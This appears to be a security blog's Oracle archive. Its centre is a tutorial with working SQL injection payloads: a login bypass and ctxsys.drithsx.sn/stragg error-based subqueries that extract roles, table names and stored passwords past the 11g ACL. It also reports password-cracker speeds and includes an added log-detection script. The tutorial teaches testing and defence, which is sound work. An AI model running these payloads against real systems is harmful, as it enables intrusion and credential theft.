Archive for the ‘11g’ Category

New Security Features Oracle 11g Release 2

Tuesday, September 1st, 2009

Here are the new security features of Oracle 11g Release 2.

  • Enhancements to the Audit Trail Cleanup Process
    (Oracle has added several enhancements to the audit trail cleanup process, e.g. set a maximum size and age for OS audit trails, move the audit trail out of the SYSTEM tablespace, purge audit trail records in one operation or via a purge job, timestamp audit trail records based on their archive date)
  • Enhancements to Directory Objects
    (Execute privilege for directory objects. Since Oracle 11.1.0./10.2.0.5 it is possible to run OS commands via external tables. This privilege makes it possible to restrict the execution of OS commands.
    Auditing of directory objects: "AUDIT EXECUTE ON DIRECTORY rds_dir BY ACCESS;")
  • Enhancements to Fine-Grained Access to External Network Services
    (utl_http supports the Amazon Simple Storage Service (S3) scheme,
    support for IPv6)
  • Global Application Contexts Available Across Oracle RAC Instances
  • Secure Sockets Layer (SSL) Version 2 Support Change
    (SSL version 2 is no longer included in the default list of supported protocols)
  • Tablespace Master Key Rekey: Changing the Encryption Key Password
    (To fulfil the PCI DSS requirements it is now possible to rotate the encryption key)

Some features are deprecated with this version of Oracle:

  • DB_EXTENDED Setting for the AUDIT_TRAIL Parameter Deprecated
    (instead use the DB,EXTENDED string)
  • WKUSER Role and Ultra Search Schemas Deprecated
    (The WKUSER role and the schemas WKSYS, WKTEST, WKPROXY have been deprecated)
  • Database Configuration Assistant No Longer Provides Default Security Settings
    (Audit options and password policies are automatically added to the database if you use DBCA)
  • ALTER USER Clause AUTHENTICATED USING PASSWORD Deprecated
    (btw, IDENTIFIED BY VALUES is still undocumented; see the Oracle documentation)
  • Password for the listener.ora File Deprecated
    (According to Oracle it is no longer needed and will be removed in Oracle 12)

Tutorial: Oracle SQL Injection in Webapps – Part I

Saturday, January 17th, 2009

This blog entry will show a SQL Injection example based on a JSP application (thanks to Slavik) and Oracle 11.1.0.7. An Oracle SQL Injection Cheat Sheet is available on our webpage.

With Oracle 11g, Oracle introduced some security enhancements that are active by default, e.g. the ACL for PL/SQL packages accessing the network. These packages are UTL_HTTP, UTL_INADDR, UTL_TCP, … Some old, well-known tricks like the usage of utl_inaddr no longer work for non-DBAs in 11g. The following tutorial will show how to bypass these restrictions and will show some new tricks.

First we start with a vulnerable webapp:

Oracle SQL Injection Picture 1

In this webapp we can log in to an employee directory. If we try to guess a valid combination, e.g. scott / tiger, we get an error message.

Oracle SQL Injection

OK, let's try to use a single quote ' as the user login. And BANG: ERROR

Oracle SQL Injection Picture 3

„ORA-01756 – Anführungsstrich fehlt bei Zeichenfolge“.

If you do not speak German, you can look up the English translation of this error message on Google. It is not uncommon to receive an error message in a foreign language (if you work internationally).

There are several websites, so I take the first result. The translation is "ORA-01756: quoted string not properly terminated". This is a common error message indicating a SQL Injection vulnerability.

A typical SQL Injection string is

' or 1=1--

If we use this string, we are getting the following result:

Oracle SQL Injection Picture 4

By using ' or 1=1-- we successfully logged on to the system. But we are interested in the data, not in the account of the webapp.

Oracle SQL Injection Picture 5

We are able to inject our own code. This page does not return data from the database so the usage of UNION SELECT is not an option.

But what are the next steps?

1. Enumeration of the database:
Let’s find out the version number of the Oracle database:

Now we try to inject the following command in the login field

' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

Oracle SQL Injection Picture 6

Again an ORA-01756 error. This time it is a different problem: the login field is limited to 50 characters, but the string we are injecting is longer. That's why we convert the POSTs to GETs.
The Web Developer plugin for Firefox can do this (plus many other useful things like saving the webpage locally, removing form restrictions online, …).

After doing the conversion from POSTs to GETs we can modify the injected string in the URL:

Oracle SQL Injection Picture 8

Again we get a German error message:
ORA-24247 Netzwerkzugriff von Access Control List (ACL) abgelehnt.

A quick lookup shows the English translation:

ORA-24247  network access denied by access control list (ACL)

OK, the default hardening from Oracle is working. We are not able to send information via DNS or create a specially crafted error message using utl_inaddr.

I was looking for an alternative and I found the following function:
ctxsys.drithsx.sn

So we replace utl_inaddr with ctxsys.drithsx.sn (plus one additional parameter).

Our new injection looks like:

' or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))--

After injecting this we get the following error message:

Oracle SQL Injection Picture 9

ORA-20000: Oracle Text-Fehler
DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production ist nicht vorhanden

The error message contains the database version. The reason for this behaviour is that the error message contains the result of the subquery (select banner from v$version where rownum=1) embedded in our injected string. This query returns the first row of v$version.

Retrieving data via error messages is normally limited to 1 column and 1 row. The limitation of 1 column can be bypassed using the string concatenation operator || (col1||col2). To bypass the limitation to a single row, most pentesters enumerate the rows one by one using rownum.

But Oracle 11g offers a new function: stragg

This function can convert multiple rows into a single row. In one of the next tutorials I will show how to do this in Oracle 9 and 10. We can now use the function stragg to get all rows in the error message:

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)||' ' from v$version))--

Oracle SQL Injection Picture 9a

Now we have everything we need to retrieve all data (according to our privileges) from the database.

Let's see what privileges we have:

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct granted_role||';') from user_role_privs))--

Oracle SQL Injection Picture 10

We have the CONNECT and RESOURCE roles.

The next step is to get all tables with a password column:

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||'.'||table_name||'['||data_type||'];') from all_tab_columns where column_name='PASSWORD'))--

Oracle SQL Injection Picture 11

There is a table called SHOP.SHOPUSER. We now use the following command to extract all passwords from this table:

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||';') from shop.shopuser))--

Oracle SQL Injection Picture 12

Using this approach we can retrieve the entire content of a table without using UNION SELECT.

SUMMARY of the used injected commands:

' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

' or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||';') from user_role_privs))--

' or 1=utl_inaddr.get_host_address((select sys.stragg(distinct owner||'.'||table_name||'['||data_type||'];') from all_tab_columns where column_name='PASSWORD'))--

' or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||';') from shop.shopuser))--
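From the defender's side, as an added example that is not part of the original post: once the injected login value travels in the URL (the POST-to-GET conversion above), the payloads leave recognisable traces in ordinary web-server access logs, and the Oracle errors quoted above surface in application logs. The access-log and application-log lines, the login.jsp path and the log formats are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not from the post). After the
# POST-to-GET conversion the injected login value is visible in the request URL.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jan/2009:10:01:02 +0100] "GET /login.jsp?user=scott&pass=tiger HTTP/1.1" 200 512
10.0.0.5 - - [17/Jan/2009:10:01:20 +0100] "GET /login.jsp?user=%27+or+1%3D1--&pass=x HTTP/1.1" 200 2048
10.0.0.5 - - [17/Jan/2009:10:02:05 +0100] "GET /login.jsp?user=%27+or+1%3Dctxsys.drithsx.sn(1%2C(select+banner+from+v%24version+where+rownum%3D1))--&pass=x HTTP/1.1" 500 731
"""
# Constructed application-log lines carrying the Oracle errors quoted in the post.
SAMPLE_APP_LOG = """\
2009-01-17 10:01:20 ERROR login: ORA-01756: quoted string not properly terminated
2009-01-17 10:01:40 ERROR login: ORA-24247: network access denied by access control list (ACL)
2009-01-17 10:02:05 ERROR login: ORA-20000: Oracle Text error DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production does not exist
"""
# Signatures derived from the post's payloads, matched on the decoded, lower-cased query string.
PAYLOAD_PATTERNS = {
    "boolean_bypass": re.compile(r"'\s*or\s+1\s*=\s*1"),
    "utl_inaddr": re.compile(r"utl_inaddr\.get_host_address"),
    "ctxsys_drithsx": re.compile(r"ctxsys\.drithsx\.sn"),
    "stragg": re.compile(r"\bstragg\s*\("),
    "dictionary_view": re.compile(r"v\$version|all_tab_columns|user_role_privs"),
    "comment_terminator": re.compile(r"--(&|$)"),
}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
ERROR_RE = re.compile(r"\b(?:ORA|DRG)-\d{5}\b")

def scan_access_log(text):
    """One finding per request whose query string matches a payload signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("path"):
            continue
        query = unquote_plus(m.group("path").split("?", 1)[1]).lower()
        hits = [name for name, pat in PAYLOAD_PATTERNS.items() if pat.search(query)]
        if hits:
            findings.append({"ip": m.group("ip"), "status": m.group("status"), "signatures": hits})
    return findings

def oracle_error_codes(text):
    """Count ORA-/DRG- codes: ORA-01756 marks an unbalanced quote reaching the
    parser, ORA-24247 marks a network callout blocked by the ACL."""
    counts = {}
    for code in ERROR_RE.findall(text):
        counts[code] = counts.get(code, 0) + 1
    return counts
```

A spike of ORA-01756 followed by ORA-24247 or ORA-20000/DRG-11701 from the same client is the sequence the tutorial walks through, so correlating the two functions' output by timestamp and source IP is the useful alert.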

New version of cain with support for 11g passwords

Sunday, December 14th, 2008

2 weeks ago, Massimiliano Montoro, aka Mao, released a new version of Cain & Abel.

Here are some of the new features of Cain & Abel v4.9.25:

– Oracle 11g (case sensitive) Password Extractor via ODBC.
– Added Oracle 11g Password Cracker (Dictionary and Brute-Force Attacks).
– Added support for Oracle TNS 11g (AES-192) in Oracle TNS Hashes Password Cracker.
– Added support for Oracle TNS 11g (AES-192) in Oracle TNS sniffer filter.
– Experimental SQL Query tool via ODBC.

Cain Screenshot

The AES implementation of Cain is slower than the implementation of GSAuditor (6,172,839 vs 2,654,719 on a 2.4 GHz C2D E4600), but 2.6 million passwords per second (via brute force) is still quite fast.

Massimiliano also wrote 3 interesting whitepapers about TNS authentication, based on László Tóth's work. Instead of using oran10.dll/oran11.dll, Mao uses the OpenSSL library:

Oracle 9i TNS 3DES authentication details 
Oracle 10g TNS AES-128 authentication details
Oracle 11g TNS AES-192 authentication details

Looking Glass and Oracle 11g

Friday, April 11th, 2008

Yesterday I read an article about Apple QuickTime and LookingGlass. I downloaded the free tool from the website of Errata Security.

Here are the results from a test with Oracle 11.1.0.6 on Windows. I have scanned the Oracle Home and the tool found 518 Oracle files with dangerous functions like strcpy, sprintf, sscanf, strcat, …

Output Looking Glass

The Oracle executable (oracle.exe), for example, uses wsprintfA, strncpy, sprintf, sscanf, _vsnprintf, _snprintf, vprintf, strncat, strtok, strlen, strcpy, strcat.

Oracle Password Cracker Benchmarks

Tuesday, October 9th, 2007

Today Laszlo released his password cracker woraauthbf for Oracle, the fastest Windows tool for cracking Oracle passwords (it supports the new and old password hash formats plus the authentication attack).

On his webpage Laszlo has a small benchmark comparing the 3 leading Oracle password crackers checkpwd, orabf and woraauthbf. According to Laszlo's benchmark checkpwd 1.22 is the slowest cracker (but only out of these 3).

I was surprised that checkpwd was so slow compared to the benchmarks I did on my systems. The reason for this bad result was the way Laszlo performed the tests.

Laszlo was testing only 1 password hash. The implementation of reading the dictionary file is slow, and that's why this affects the entire result of checkpwd. In the real world you are normally testing many password hashes and not only 1 hash.
That's why I ran a benchmark of how long it takes to crack 40 hashes (instead of 1 hash) with the new checkpwd 2.0, which supports reading password hashes from a text file (to get rid of the file reading overhead). I ran the tests on my 2 GHz Core2Duo.

woraauthbf 0.2 1.103.773 pw/s (Laszlo: 515114 pw/s)

checkpwd 2.0 637.263 pw/s (Laszlo: 193.168 pw/s)

orabf 0.76 400.000 pw/s (Laszlo: 311.994 pw/s)

Checkpwd 2.0 was nearly 2 times faster in this benchmark, just by cracking 40 instead of 1 password (637.263 vs 309.057).

In checkpwd 2.0 we will focus on intelligent password cracking instead of pure power, but we are still interested in improving the speed of checkpwd.
Here are some new features of checkpwd 2 (released next week):

* cracking APEX passwords
* support for Oracle 11g
* support for Oracle Password History
* intelligent password collector
* many new options
* …